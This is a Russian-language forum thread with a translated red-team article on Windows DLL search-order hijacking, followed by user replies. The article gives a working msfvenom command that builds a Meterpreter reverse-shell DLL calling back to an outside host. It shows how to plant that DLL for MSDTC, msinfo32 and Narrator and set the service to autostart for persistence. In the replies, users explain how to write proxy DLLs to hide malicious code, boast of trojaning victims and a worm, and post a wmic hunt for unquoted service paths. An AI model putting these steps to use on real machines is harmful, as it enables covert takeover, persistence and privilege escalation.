Статья DLL Hijacking

Когда программа запускается, несколько DLL загружаются в область памяти ее процесса. Windows ищет библиотеки DLL, необходимые для процесса, просматривая системные папки в определенном порядке. Перехват порядка поиска может использоваться в сценариях «красных» для определения возможности

Ссылка скрыта от гостей

и сохранения.

Кроме того, в отчетах показаны распространенные вредоносные программы, которые пытаются маскироваться под DLL, отсутствуя в процессе Windows, чтобы выполнить произвольный код и остаться скрытыми. Плоскость атаки в отношении кражи DLL огромна и зависит от версии операционной системы и установленного программного обеспечения. Однако некоторые из наиболее заметных, которые можно использовать в Windows 7 и Windows 10, описаны в этой статье.

MSDTC
The Distributed Transaction Coordinator - это служба Windows, отвечающая за координацию транзакций между базами данных (SQL Server) и веб-серверами. При запуске этой службы пытается загрузить следующие три DLL-файлы из System32.

oci.dll
SQLLib80.dll
xa80.dll

Они определены в следующем разделе реестра:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSDTC\MTxOCI

Ключ реестра - oci.dll

В установках Windows по умолчанию « oci.dll » отсутствует в папке System32. Это дает возможность внедрить в эту папку произвольную библиотеку DLL с таким же именем (требуются права администратора) для выполнения вредоносного кода. Утилита Metasploit «msfvenom» может генерировать файлы DLL, которые будут содержать полезную нагрузку.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.13 LPORT=8888 -f dll > pentestlab.dll

Создать произвольную DLL

Службу координатора распределенных транзакций можно запустить из службы Windows или выполнив следующую команду из оболочки с повышенными привилегиями:
net start msdtc

Служба координатора распределенных транзакций

Когда процесс запускается, запускается произвольная DLL, и открывается сеанс Meterpreter с привилегиями сетевой службы.

Meterpreter - oci DLL

Просмотр процесса «msdtc.exe» в Process Explorer проверит, что DLL была загружена в процесс.

Process Explorer - oci.dll

Разрешения могут быть изменены на Администратора, если из командной строки с повышенными правами выполняется следующее.
msdtc -install

msdtc -install

Выполнение «getuid» из сеанса Meterpreter проверит, что процесс, который он сейчас выполняет под «pentestlab», является локальным администратором.

msdtc - привилегии администратора

Служба «msdtc» не настроена на запуск при загрузке по умолчанию, поскольку тип запуска установлен на «Ручной». Конфигурирование службы для автоматического запуска при загрузке загрузит произвольную DLL и создаст постоянство в системе.

sc qc msdtc
sc config msdtc start= auto

Persistence – Distributed Transaction Coordinator

MSInfo

Ссылка скрыта от гостей

написал в своем блоге в 2013 году о

Ссылка скрыта от гостей

который является техникой, основанной на загрузке произвольных библиотек DLL из процесса Windows, в которых отсутствуют определенные библиотеки DLL. Microsoft System Information Tool отвечает за сбор информации об оборудовании, программном обеспечении и компонентах системы. В современных версиях Windows, таких как 8.1 и 10, этот процесс пытается загрузить недостающую DLL из System32, которая называется «fveapi.dll». Установка в этот каталог вредоносной библиотеки DLL с таким же именем приведет к загрузке библиотеки DLL в процесс «msinfo32.exe».

msinfo - Process Explorer

Сеанс Meterpreter с PID 4496 дочерним процессом «msinfo32.exe».

msinfo - Meterpreter

Narrator
Microsoft Narrator - это приложение для чтения с экрана для сред Windows. Адам обнаружил, что DLL, связанная с настройками локализации, отсутствует (MSTTSLocEnUS.DLL) и может также использоваться для выполнения произвольного кода. DLL отсутствует в следующем месте:

C:\Windows\System32\Speech\Engines\TTS\MSTTSLocEnUS.DLL

Narrator DLL

При запуске процесса «Narrator.exe» в этот процесс загружается DLL, как это видно из Process Explorer.

Narrator DLL Process Explorer


Перевод:

Ссылка скрыта от гостей

 

[RfvCode]

Зачем эта тема, если переводить страницу гугл переводчиком (справа в верхнем углу), то перевод такой-же

 

[viktor plutt]

Все это конечно весело, но если у меня есть физический доступ у компу жертвы, да еще с правами админа, то я найду 20 способов как его затроянить. Что касается внедрения длл-лок, то есть хорошая либа msimg32.dll ( оригинальные размер 8 кб ) ее используют многие проги - я ее просто переписал и пользуюсь когда нужно. Кроме того очень просто внедрять длл СОМ - серверы. И еще можно написать длл сервис который грузиться в процесс secrvices. И на закуску - можно использовать либу Detours и внедрить свою длл-ку в в любой файл. Во всех этих случаях длл-ка будет сидеть в каком-либо процессе и якобы не видна. У меня был прикольный червяк который прописывался в системе как прокси ко всем СОМ серверам в реестре и когда его антивир удалял по сигнатуре вся винда накрывалась медным тазом

 

[MsLacota]

Все это конечно весело, но если у меня есть физический доступ у компу жертвы, да еще с правами админа, то я найду 20 способов как его затроянить. Что касается внедрения длл-лок, то есть хорошая либа msimg32.dll ( оригинальные размер 8 кб ) ее используют многие проги - я ее просто переписал и пользуюсь когда нужно. Кроме того очень просто внедрять длл СОМ - серверы. И еще можно написать длл сервис который грузиться в процесс secrvices. И на закуску - можно использовать либу Detours и внедрить свою длл-ку в в любой файл. Во всех этих случаях длл-ка будет сидеть в каком-либо процессе и якобы не видна. У меня был прикольный червяк который прописывался в системе как прокси ко всем СОМ серверам в реестре и когда его антивир удалял по сигнатуре вся винда накрывалась медным тазом

Не могли бы вы в доступной форме и в подробностях расписать как написать такую dll, так что бы она дёргала необходимые функции из настоящей dll и давала их вызываемой службе, то есть типа прокси что бы была.

 

[viktor plutt]

Не могли бы вы в доступной форме и в подробностях расписать как написать такую dll, так что бы она дёргала необходимые функции из настоящей dll и давала их вызываемой службе, то есть типа прокси что бы была.

все это очевидно для любого кто хоть раз писал дллку
1. по Detours все подробно написано в хелпе
2. в общем случае переименовываешь оригинальную, делаешь свою дллку в дефайле опредиляешь все функции оригинальной, а в реализации каждой функции вызываешь функции из переименованной оригинальной.
3. для создания СОМ серверов я использую свою либу в которой реализовано ядро СОМ функции DllGetClassObject DllCanUnloadNow DllRegister\UnregisterServer интерфейсы IUnknown IClassFactory IDispatch. Берем оригинальную таблицу типов по ней пишем реализацию интерфейса с переадресацией на оригинал. В VS есть ATL при ее помощи можно создавать прокси либы очень просто.

 

[Ondrik8]

а без прав админа слабо?

Все это конечно весело, но если у меня есть физический доступ у компу жертвы, да еще с правами админа, то я найду 20 способов как его затроянить. Что касается внедрения длл-лок, то есть хорошая либа msimg32.dll ( оригинальные размер 8 кб ) ее используют многие проги - я ее просто переписал и пользуюсь когда нужно. Кроме того очень просто внедрять длл СОМ - серверы. И еще можно написать длл сервис который грузиться в процесс secrvices. И на закуску - можно использовать либу Detours и внедрить свою длл-ку в в любой файл. Во всех этих случаях длл-ка будет сидеть в каком-либо процессе и якобы не видна. У меня был прикольный червяк который прописывался в системе как прокси ко всем СОМ серверам в реестре и когда его антивир удалял по сигнатуре вся винда накрывалась медным тазом

совершенно согласен с данным коментом!

ТС может поведали бы народу про поиск не цетируемых DLL-ок без кавычек, которые относятся к программам в путях реестра?)
Для повышения привелегий до статуса Администратор)

скажу куда копать:

wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:Windows\" |findstr /i /v """

аа сорян, ты же переводчик...)